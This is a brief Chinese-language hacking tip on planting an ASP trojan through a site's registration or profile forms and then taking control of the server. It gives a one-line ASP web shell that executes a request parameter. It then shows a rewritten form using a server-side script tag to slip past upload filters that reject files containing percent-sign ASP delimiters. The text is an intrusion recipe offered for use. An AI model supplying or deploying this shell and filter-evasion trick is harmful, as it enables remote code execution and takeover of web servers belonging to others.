很多時候,我們可以通過在注冊表單或者用戶信息修改表單中,插入簡短的ASP代碼,使網站ASP數據庫變成為一個ASP木馬,然后進一步入侵控制服務器。
不過,在上傳代碼過程中,許多網頁程序都不允許包含〈%%〉標記符號的內容的文件上傳。
這樣就有好多SHELL不能上傳上去了。可以采用下面的方法解決。以藍屏最小ASP木馬為例。
首先:原程序代碼是:
〈%execute request("l")%〉 |
我們可以把它的標簽換下來。
然后改成:
〈scriptlanguage=VBScript runat=server〉execute request("l")〈/Script〉 |
這樣就避開了使用〈%%〉,保存為.ASP,程序同樣執行。
